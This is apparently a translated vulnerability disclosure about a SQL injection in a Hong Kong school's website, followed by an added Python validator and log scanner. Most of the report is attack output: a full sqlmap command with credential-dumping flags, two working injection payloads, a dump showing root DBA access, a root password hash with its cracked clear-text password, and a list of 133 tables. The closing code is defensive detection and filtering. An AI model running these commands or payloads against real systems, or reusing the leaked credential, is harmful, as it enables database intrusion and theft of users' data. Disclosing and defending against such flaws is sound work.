2015-10-25: Details reported to the vendor; awaiting vendor handling
2015-10-28: Vendor confirmed; details disclosed to the vendor only
2015-11-07: Details disclosed to core white hats and experts in the relevant field
2015-11-17: Details disclosed to regular white hats
2015-11-27: Details disclosed to intern white hats
2015-12-12: Details disclosed to the public
SQL injection on a page of 啟思中學 (Hong Kong) (DBA privileges / weak root password leaked / 133 tables)
Test URL: http://**.**.**.**/index.php?option=com_content&view=article&id=16&Itemid=96
python sqlmap.py -u "http://**.**.**.**/index.php?option=com_content&view=article&id=16&Itemid=96" -p id --technique=BE --random-agent --batch --current-user --is-dba --users --passwords
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: option=com_content&view=article&id=16 RLIKE (SELECT (CASE WHEN (4995=4995) THEN 16 ELSE 0x28 END))&Itemid=96

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: option=com_content&view=article&id=16 AND (SELECT 6720 FROM(SELECT COUNT(*),CONCAT(0x716b766b71,(SELECT (ELT(6720=6720,1))),0x716b6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Itemid=96
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.4.16, Apache 2.2.15
back-end DBMS: MySQL 5.0
current user: 'root@localhost'
current user is DBA: True

database management system users [5]:
[*] ''@'localhost'
[*] ''@'**.**.**.**'
[*] 'root'@'**.**.**.**'
[*] 'root'@'localhost'
[*] 'root'@'**.**.**.**'

database management system users password hashes:
[*] root [2]:
    password hash: *EB87920C7207E533743E4C5D8C6AF2CC61C71B35
        clear-text password: maintain
    password hash: NULL

available databases [4]:
[*] information_schema
[*] mysql
[*] schoolweb
[*] test

Database: schoolweb
[133 tables]
+-------------------------------+
| x3sug_ak_acl                  |
| x3sug_ak_profiles             |
| x3sug_ak_stats                |
| x3sug_ak_storage              |
| x3sug_assets                  |
| x3sug_associations            |
| x3sug_banner                  |
| x3sug_banner_clients          |
| x3sug_banner_tracks           |
| x3sug_bannerclient            |
| x3sug_banners                 |
| x3sug_bannertrack             |
| x3sug_categories              |
| x3sug_contact_details         |
| x3sug_content                 |
| x3sug_content_frontpage       |
| x3sug_content_rating          |
| x3sug_content_types           |
| x3sug_contentitem_tag_map     |
| x3sug_core_log_searches       |
| x3sug_datasafe_pro            |
| x3sug_eweather_cache          |
| x3sug_eweather_locations      |
| x3sug_eweather_prefs          |
| x3sug_eweather_profiles       |
| x3sug_export_categories       |
| x3sug_export_content          |
| x3sug_export_sections         |
| x3sug_extensions              |
| x3sug_fabanner                |
| x3sug_fabannerin              |
| x3sug_fabannerlang            |
| x3sug_fabannerlocation        |
| x3sug_faclient                |
| x3sug_falink                  |
| x3sug_falocation              |
| x3sug_fasize                  |
| x3sug_finder_filters          |
| x3sug_finder_links            |
| x3sug_finder_links_terms0     |
| x3sug_finder_links_terms1     |
| x3sug_finder_links_terms2     |
| x3sug_finder_links_terms3     |
| x3sug_finder_links_terms4     |
| x3sug_finder_links_terms5     |
| x3sug_finder_links_terms6     |
| x3sug_finder_links_terms7     |
| x3sug_finder_links_terms8     |
| x3sug_finder_links_terms9     |
| x3sug_finder_links_termsa     |
| x3sug_finder_links_termsb     |
| x3sug_finder_links_termsc     |
| x3sug_finder_links_termsd     |
| x3sug_finder_links_termse     |
| x3sug_finder_links_termsf     |
| x3sug_finder_taxonomy         |
| x3sug_finder_taxonomy_map     |
| x3sug_finder_terms            |
| x3sug_finder_terms_common     |
| x3sug_finder_tokens           |
| x3sug_finder_tokens_aggregate |
| x3sug_finder_types            |
| x3sug_flexbanners             |
| x3sug_flexbannersclient       |
| x3sug_flexbannersin           |
| x3sug_flexbannerslink         |
| x3sug_flexbannerslocations    |
| x3sug_flexbannerssize         |
| x3sug_gcalendar               |
| x3sug_jce_extensions          |
| x3sug_jce_groups              |
| x3sug_jce_plugins             |
| x3sug_jev_users               |
| x3sug_jevents_categories      |
| x3sug_jevents_exception       |
| x3sug_jevents_icsfile         |
| x3sug_jevents_repbyday        |
| x3sug_jevents_repetition      |
| x3sug_jevents_rrule           |
| x3sug_jevents_vevdetail       |
| x3sug_jevents_vevent          |
| x3sug_k2_attachments          |
| x3sug_k2_categories           |
| x3sug_k2_comments             |
| x3sug_k2_extra_fields         |
| x3sug_k2_extra_fields_groups  |
| x3sug_k2_items                |
| x3sug_k2_rating               |
| x3sug_k2_tags                 |
| x3sug_k2_tags_xref            |
| x3sug_k2_user_groups          |
| x3sug_k2_users                |
| x3sug_languages               |
| x3sug_menu                    |
| x3sug_menu_types              |
| x3sug_messages                |
| x3sug_messages_cfg            |
| x3sug_migration_configuration |
| x3sug_modules                 |
| x3sug_modules_menu            |
| x3sug_newsfeeds               |
| x3sug_overrider               |
| x3sug_postinstall_messages    |
| x3sug_redirect_links          |
| x3sug_rsbanners_ad            |
| x3sug_rsbanners_adcat         |
| x3sug_schemas                 |
| x3sug_sections                |
| x3sug_sembookings             |
| x3sug_seminar                 |
| x3sug_semnumber               |
| x3sug_session                 |
| x3sug_stats_agents            |
| x3sug_swmenu_config           |
| x3sug_swmenu_extended         |
| x3sug_swmenufree_styles       |
| x3sug_tags                    |
| x3sug_template_styles         |
| x3sug_ucm_base                |
| x3sug_ucm_content             |
| x3sug_ucm_history             |
| x3sug_update_sites            |
| x3sug_update_sites_extensions |
| x3sug_updates                 |
| x3sug_user_keys               |
| x3sug_user_notes              |
| x3sug_user_profiles           |
| x3sug_user_usergroup_map      |
| x3sug_usergroups              |
| x3sug_users                   |
| x3sug_viewlevels              |
| x3sug_weblinks                |
| x3sug_wf_profiles             |
+-------------------------------+

Database: schoolweb
Table: x3sug_user_keys
[7 columns]
+----------+------------------+
| Column   | Type             |
+----------+------------------+
| time     | varchar(200)     |
| id       | int(10) unsigned |
| invalid  | tinyint(4)       |
| series   | varchar(255)     |
| token    | varchar(255)     |
| uastring | varchar(255)     |
| user_id  | varchar(255)     |
+----------+------------------+
Add filtering.
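As an added illustration, not part of the original report and not Joomla's own input-filtering code, the script below pairs the one-line remediation ("add filtering") with a detection check. It contains a strict whitelist validator for the id parameter, which rejects anything that is not a plain positive integer rather than casting a string such as "16 RLIKE ..." down to 16, and a scanner that flags the two sqlmap payload shapes recorded above (the RLIKE/CASE WHEN boolean-blind form and the FLOOR(RAND(0)*2) ... GROUP BY error-based form) when they appear in web-server access logs. The log lines, client IP and timestamps are constructed samples; the function names and signature labels are my own.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (not taken from the report). Lines 2 and 3
# carry URL-encoded copies of the two payload shapes sqlmap reported; lines 1
# and 4 are ordinary article requests.
SAMPLE_LOG = """\
203.0.113.5 - - [25/Oct/2015:10:01:02 +0800] "GET /index.php?option=com_content&view=article&id=16&Itemid=96 HTTP/1.1" 200 8123
203.0.113.5 - - [25/Oct/2015:10:01:09 +0800] "GET /index.php?option=com_content&view=article&id=16%20RLIKE%20%28SELECT%20%28CASE%20WHEN%20%284995%3D4995%29%20THEN%2016%20ELSE%200x28%20END%29%29&Itemid=96 HTTP/1.1" 200 8123
203.0.113.5 - - [25/Oct/2015:10:01:15 +0800] "GET /index.php?option=com_content&view=article&id=16%20AND%20%28SELECT%206720%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x716b766b71%2C%28SELECT%20%28ELT%286720%3D6720%2C1%29%29%29%2C0x716b6b7871%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29&Itemid=96 HTTP/1.1" 500 412
203.0.113.5 - - [25/Oct/2015:10:02:00 +0800] "GET /index.php?option=com_content&view=article&id=17&Itemid=96 HTTP/1.1" 200 7990
"""

# Signatures (my own labels) for the two techniques sqlmap used, matched
# against the percent-decoded value of each query parameter.
SIGNATURES = {
    "boolean-blind RLIKE": re.compile(r"\bRLIKE\b.*\bCASE\s+WHEN\b", re.I | re.S),
    "error-based FLOOR(RAND(0)*2) GROUP BY": re.compile(
        r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\).*\bGROUP\s+BY\b", re.I | re.S
    ),
}

# Whitelist for an article id: digits only, no leading zero, no whitespace,
# at most ten digits so it fits int(10) unsigned.
ARTICLE_ID = re.compile(r"^[1-9][0-9]{0,9}$")

# Request target inside a Common/Combined Log Format line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')


def validated_article_id(raw):
    """Return the id as an int when the raw value is a plain positive integer,
    otherwise None. Anything carrying operators or whitespace is rejected
    outright instead of being truncated to its leading digits."""
    if raw is None or not ARTICLE_ID.match(raw):
        return None
    return int(raw)


def query_params(log_line):
    """Extract the request target from a log line and return its query string
    as {name: [decoded values]}; an unparseable line yields {}."""
    m = REQUEST.search(log_line)
    if not m:
        return {}
    return parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)


def scan_log(text):
    """Return (line_number, parameter_name, signature_label) for every log line
    whose decoded query parameters match one of SIGNATURES."""
    findings = []
    for n, line in enumerate(text.splitlines(), start=1):
        for name, values in query_params(line).items():
            for value in values:
                for label, pattern in SIGNATURES.items():
                    if pattern.search(value):
                        findings.append((n, name, label))
    return findings


if __name__ == "__main__":
    for line_no, param, label in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: parameter '{param}' matches {label}")
    for raw in ("16", "16 RLIKE (SELECT 1)", "0"):
        print(f"id={raw!r} -> {validated_article_id(raw)}")
```

The validator is the filtering side: a request whose id fails the whitelist should be answered with an error before any query is built, and the accepted integer should be bound as a query parameter rather than concatenated. The scanner is the detection side: run over the access log it points at the exact requests that carried the probes, which is what you would want when confirming whether the injection point in this report was exercised by anyone other than the tester.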
Severity: High
Vulnerability Rank: 12
Confirmation time: 2015-10-28 11:47
The incident has been reported to the relevant organisation.
None yet.